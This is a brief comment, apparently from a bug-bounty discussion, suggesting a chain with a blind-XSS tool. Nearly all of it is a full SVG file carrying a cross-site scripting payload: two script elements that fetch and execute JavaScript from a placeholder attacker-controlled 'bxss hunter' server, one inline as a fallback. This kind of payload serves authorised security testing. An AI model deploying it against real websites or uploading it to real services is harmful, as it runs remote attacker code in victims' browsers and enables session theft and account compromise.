interesting. you could even chain this with bxss hunter by using this payload 

<?xml version="1.0" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"

 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg"

     xmlns:xlink="http://www.w3.org/1999/xlink">




  <!-- Load script from your BXSS server -->

  <script xlink:href="https://your-bxss-hunter-link"></script>




  <!-- Inline JS as fallback -->

  <script><![CDATA[

    var a=document.createElement("script");

    a.src="https://your-bxss-hunter-link";

    document.body.appendChild(a);

  ]]></script>

</svg>




